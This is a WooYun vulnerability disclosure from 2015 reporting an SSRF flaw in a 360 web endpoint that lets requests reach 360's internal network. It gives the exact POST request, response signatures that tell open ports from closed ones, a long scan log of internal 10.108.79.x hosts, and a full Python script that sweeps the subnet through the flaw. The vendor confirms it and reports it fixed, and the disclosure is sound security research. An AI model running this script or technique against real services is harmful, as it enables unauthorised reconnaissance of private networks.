利用一个SSRF再探360内网(附验证脚本) | wooyun-2015-090257

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-090257

漏洞标题：

利用一个SSRF再探360内网(附验证脚本)

漏洞详情

披露状态：

2015-01-06：细节已通知厂商并且等待厂商处理中
2015-01-06：厂商已经确认，细节仅向厂商公开
2015-01-16：细节向核心白帽子及相关领域专家公开
2015-01-26：细节向普通白帽子公开
2015-02-05：细节向实习白帽子公开
2015-02-20：细节向公众公开

简要描述：

利用一个SSRF再探360内网(附验证脚本)

详细说明：

SSRF位于：

POST http://wasai.360.cn/gen_inform.php
city=http://10.108.79.189:80/&imgurl=&name=e&time=2015-1-6&weibo=1

脚本会向参数city和imgurl指定的目标发起HTTP请求,可探测360内网。
如果不开放HTTP服务，返回特征串：

13:32:34 <glueImage img error:http_code:0 content_length:-1 image_length:0>

如果对应的端口开放了HTTP服务，则可能返回3种情况：
1）图片生成成功了

{"s":true,"m":"ok","d":"http:\/\/p1.qhimg.com\/t011db843f5245a2050.jpg"}

2）返回非200的状态码

<glueImage img error:http_code:404 content_length:202 image_length:202>

3) 返回200，但不是一个正确的图片

<glueImage img error:UnableToOpenFile `/tmp/magick-6713FEEry8oqbqOu': No such file or directory @ error/constitute.c/ReadImage/594>

漏洞证明：

测试扫描10.108.79.* C段:

D:\ssrf>360_ssrf_2.py
[OK]http://10.108.79.6:80/      =>      200 (Not an Image)
[OK]http://10.108.79.10:80/     =>      200 (Not an Image)
[OK]http://10.108.79.12:80/     =>      200 (Not an Image)
[OK]http://10.108.79.11:80/     =>      200 (Not an Image)
[OK]http://10.108.79.14:80/     =>      http_code:404 content_length:168
[OK]http://10.108.79.16:80/     =>      http_code:404 content_length:168
[OK]http://10.108.79.17:80/     =>      http_code:404 content_length:168
[OK]http://10.108.79.18:80/     =>      200 (Not an Image)
[OK]http://10.108.79.20:80/     =>      200 (Not an Image)
[OK]http://10.108.79.22:80/     =>      200 (Not an Image)
[OK]http://10.108.79.21:80/     =>      200 (Not an Image)
[OK]http://10.108.79.26:80/     =>      http_code:401 content_length:401
[OK]http://10.108.79.29:80/     =>      200 (Not an Image)
[OK]http://10.108.79.27:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.31:80/     =>      200 (Not an Image)
[OK]http://10.108.79.33:80/     =>      200 (Not an Image)
[OK]http://10.108.79.34:80/     =>      200 (Not an Image)
[OK]http://10.108.79.35:80/     =>      200 (Not an Image)
[OK]http://10.108.79.39:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.38:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.42:80/     =>      200 (Not an Image)
[OK]http://10.108.79.43:80/     =>      200 (Not an Image)
[OK]http://10.108.79.41:80/     =>      200 (Not an Image)
[OK]http://10.108.79.49:80/     =>      200 (Not an Image)
[OK]http://10.108.79.44:80/     =>      200 (Not an Image)
[OK]http://10.108.79.48:80/     =>      200 (Not an Image)
[OK]http://10.108.79.47:80/     =>      200 (Not an Image)
[OK]http://10.108.79.50:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.54:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.55:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.53:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.58:80/     =>      200 (Not an Image)
[OK]http://10.108.79.59:80/     =>      200 (Not an Image)
[OK]http://10.108.79.57:80/     =>      200 (Not an Image)
[OK]http://10.108.79.60:80/     =>      200 (Not an Image)
[OK]http://10.108.79.61:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.63:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.62:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.66:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.69:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.64:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.65:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.71:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.72:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.73:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.76:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.78:80/     =>      200 (Not an Image)
[OK]http://10.108.79.79:80/     =>      200 (Not an Image)
[OK]http://10.108.79.77:80/     =>      200 (Not an Image)
[OK]http://10.108.79.80:80/     =>      200 (Not an Image)
[OK]http://10.108.79.81:80/     =>      200 (Not an Image)
[OK]http://10.108.79.82:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.89:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.88:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.90:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.92:80/     =>      http_code:403 content_length:168
[OK]http://10.108.79.95:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.93:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.94:80/     =>      http_code:404 content_length:198
[OK]http://10.108.79.105:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.108:80/    =>      http_code:404 content_length:168
[OK]http://10.108.79.103:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.104:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.106:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.118:80/    =>      200 (Not an Image)
[OK]http://10.108.79.117:80/    =>      200 (Not an Image)
[OK]http://10.108.79.119:80/    =>      200 (Not an Image)
[OK]http://10.108.79.121:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.123:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.122:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.127:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.126:80/    =>      http_code:404 content_length:168
[OK]http://10.108.79.124:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.125:80/    =>      http_code:404 content_length:168
[OK]http://10.108.79.130:80/    =>      http_code:403 content_length:202
[OK]http://10.108.79.128:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.129:80/    =>      http_code:403 content_length:202
[OK]http://10.108.79.136:80/    =>      http_code:404 content_length:168
[OK]http://10.108.79.134:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.135:80/    =>      http_code:404 content_length:168
[OK]http://10.108.79.140:80/    =>      http_code:404 content_length:168
[OK]http://10.108.79.145:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.143:80/    =>      http_code:404 content_length:162
[OK]http://10.108.79.147:80/    =>      200 (Not an Image)
[OK]http://10.108.79.144:80/    =>      http_code:404 content_length:162
[OK]http://10.108.79.148:80/    =>      200 (Not an Image)
[OK]http://10.108.79.146:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.149:80/    =>      200 (Not an Image)
[OK]http://10.108.79.150:80/    =>      200 (Not an Image)
[OK]http://10.108.79.160:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.157:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.154:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.156:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.159:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.158:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.155:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.151:80/    =>      200 (Not an Image)
[OK]http://10.108.79.164:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.166:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.167:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.162:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.165:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.168:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.163:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.170:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.169:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.161:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.173:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.171:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.175:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.172:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.174:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.176:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.177:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.180:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.178:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.181:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.182:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.188:80/    =>      200 (Not an Image)
[OK]http://10.108.79.184:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.183:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.186:80/    =>      200 (Not an Image)
[OK]http://10.108.79.185:80/    =>      200 (Not an Image)
[OK]http://10.108.79.187:80/    =>      200 (Not an Image)
[OK]http://10.108.79.190:80/    =>      200
[OK]http://10.108.79.189:80/    =>      200
[OK]http://10.108.79.194:80/    =>      200 (Not an Image)
[OK]http://10.108.79.195:80/    =>      200 (Not an Image)
[OK]http://10.108.79.198:80/    =>      200 (Not an Image)
[OK]http://10.108.79.193:80/    =>      200 (Not an Image)
[OK]http://10.108.79.196:80/    =>      200 (Not an Image)
[OK]http://10.108.79.197:80/    =>      200 (Not an Image)
[OK]http://10.108.79.200:80/    =>      200 (Not an Image)
[OK]http://10.108.79.199:80/    =>      200 (Not an Image)
[OK]http://10.108.79.201:80/    =>      200 (Not an Image)
[OK]http://10.108.79.204:80/    =>      200 (Not an Image)
[OK]http://10.108.79.202:80/    =>      200 (Not an Image)
[OK]http://10.108.79.203:80/    =>      200 (Not an Image)
[OK]http://10.108.79.205:80/    =>      200 (Not an Image)
[OK]http://10.108.79.206:80/    =>      200 (Not an Image)
[OK]http://10.108.79.207:80/    =>      200 (Not an Image)
[OK]http://10.108.79.208:80/    =>      200 (Not an Image)
[OK]http://10.108.79.210:80/    =>      200 (Not an Image)
[OK]http://10.108.79.211:80/    =>      200 (Not an Image)
[OK]http://10.108.79.212:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.213:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.220:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.219:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.221:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.222:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.223:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.225:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.224:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.226:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.227:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.230:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.232:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.233:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.234:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.239:80/    =>      200 (Not an Image)
[OK]http://10.108.79.235:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.237:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.236:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.240:80/    =>      200 (Not an Image)
[OK]http://10.108.79.241:80/    =>      200 (Not an Image)
[OK]http://10.108.79.242:80/    =>      200 (Not an Image)
[OK]http://10.108.79.243:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.247:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.245:80/    =>      200 (Not an Image)
[OK]http://10.108.79.246:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.249:80/    =>      http_code:404 content_length:198
[OK]http://10.108.79.250:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.251:80/    =>      http_code:403 content_length:168
[OK]http://10.108.79.23:8080/   =>      200 (Not an Image)
[OK]http://10.108.79.25:8080/   =>      200 (Not an Image)
[OK]http://10.108.79.62:8080/   =>      http_code:403 content_length:168
[OK]http://10.108.79.61:8080/   =>      http_code:403 content_length:168
[OK]http://10.108.79.133:8080/  =>      http_code:404 content_length:0
[OK]http://10.108.79.1:8360/    =>      200 (Not an Image)
[OK]http://10.108.79.2:8360/    =>      200 (Not an Image)
[OK]http://10.108.79.3:8360/    =>      200 (Not an Image)
[OK]http://10.108.79.4:8360/    =>      200 (Not an Image)
[OK]http://10.108.79.11:8360/   =>      http_code:404 content_length:0
[OK]http://10.108.79.13:8360/   =>      200 (Not an Image)
[OK]http://10.108.79.15:8360/   =>      200 (Not an Image)
[OK]http://10.108.79.20:8360/   =>      200
[OK]http://10.108.79.18:8360/   =>      http_code:500 content_length:0
[OK]http://10.108.79.26:8360/   =>      http_code:404 content_length:198
[OK]http://10.108.79.28:8360/   =>      http_code:404 content_length:198
[OK]http://10.108.79.27:8360/   =>      http_code:404 content_length:198
[OK]http://10.108.79.36:8360/   =>      200 (Not an Image)
[OK]http://10.108.79.37:8360/   =>      200 (Not an Image)
[OK]http://10.108.79.42:8360/   =>      http_code:502 content_length:172
[OK]http://10.108.79.59:8360/   =>      http_code:404 content_length:0
[OK]http://10.108.79.63:8360/   =>      http_code:302 content_length:0
[OK]http://10.108.79.64:8360/   =>      http_code:302 content_length:0
[OK]http://10.108.79.66:8360/   =>      http_code:404 content_length:0
[OK]http://10.108.79.80:8360/   =>      http_code:403 content_length:168
[OK]http://10.108.79.79:8360/   =>      http_code:403 content_length:168
[OK]http://10.108.79.96:8360/   =>      http_code:404 content_length:198
[OK]http://10.108.79.97:8360/   =>      http_code:404 content_length:198
[OK]http://10.108.79.100:8360/  =>      http_code:404 content_length:0
[OK]http://10.108.79.101:8360/  =>      http_code:404 content_length:0
[OK]http://10.108.79.110:8360/  =>      http_code:404 content_length:0
[OK]http://10.108.79.127:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.136:8360/  =>      http_code:403 content_length:168
[OK]http://10.108.79.135:8360/  =>      http_code:403 content_length:168
[OK]http://10.108.79.140:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.183:8360/  =>      http_code:404 content_length:198
[OK]http://10.108.79.185:8360/  =>      http_code:403 content_length:169
[OK]http://10.108.79.184:8360/  =>      http_code:500 content_length:0
[OK]http://10.108.79.186:8360/  =>      http_code:403 content_length:169
[OK]http://10.108.79.190:8360/  =>      http_code:403 content_length:162
[OK]http://10.108.79.189:8360/  =>      http_code:403 content_length:162
[OK]http://10.108.79.193:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.195:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.194:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.196:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.197:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.199:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.198:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.200:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.201:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.202:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.203:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.228:8360/  =>      http_code:404 content_length:198
[OK]http://10.108.79.230:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.235:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.237:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.236:8360/  =>      http_code:302 content_length:0
[OK]http://10.108.79.242:8360/  =>      http_code:403 content_length:169
[OK]http://10.108.79.244:8360/  =>      http_code:403 content_length:168
[OK]http://10.108.79.248:8360/  =>      http_code:403 content_length:168
[OK]http://10.108.79.250:8360/  =>      http_code:302 content_length:0
All Done

验证脚本，供参考：

#encoding=gbk
import httplib
import threading
import Queue
import json
import sys
import re
lock = threading.Lock()
queue = Queue.Queue()
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
def scan_http_service():
    while True:
        try:
            item = queue.get(timeout=1.0)
        except:
            break
        
        try:
            conn = httplib.HTTPConnection('wasai.360.cn', timeout=3)
            url = 'http://%s:%s/' % (item['ip'], item['port'])
            conn.request(method='POST',
                         url='/gen_inform.php',
                         body='city=%s&imgurl=&name=e&time=2015-1-6&weibo=1' % url,
                         headers=headers)
            html_doc = conn.getresponse().read()
            conn.close()
            if html_doc.find('http_code:0 content_length:-1') >= 0:    # no HTTP Service 
                continue
            
            if html_doc.find('img error:UnableToOpenFile') > 0:    # Not an image
                lock.acquire()
                sys.stdout.write('[OK]%s\t=>\t200 (Not an Image)\n' % url)
                lock.release()
                continue
            
            if html_doc.find('http_code:') > 0:
                 s = re.search('http_code:\d+ content_length:\d+', html_doc).group(0)
                 lock.acquire()
                 sys.stdout.write('[OK]%s\t=>\t%s\n' % (url, s) )
                 lock.release()
                 continue
                
            json_doc = json.loads(html_doc)
            if json_doc['s'] == True:
                lock.acquire()
                sys.stdout.write('[OK]%s\t=>\t200\n' % url)
                lock.release()
                
        except Exception, e:
            pass
for port in [80, 8080, 8888, 8360]:
        for i in range(1, 256):        
            queue.put({'ip': '10.108.79.%s' % i, 'port': port})
threads = []
for i in range(10):
    t = threading.Thread(target=scan_http_service)
    t.start()
    threads.append(t)
for t in threads:
    t.join()
    
print 'All Done'

修复方案：

建议限制一下目标域

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2015-01-06 15:31

厂商回复：

感谢您的反馈，相关业务已进行修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞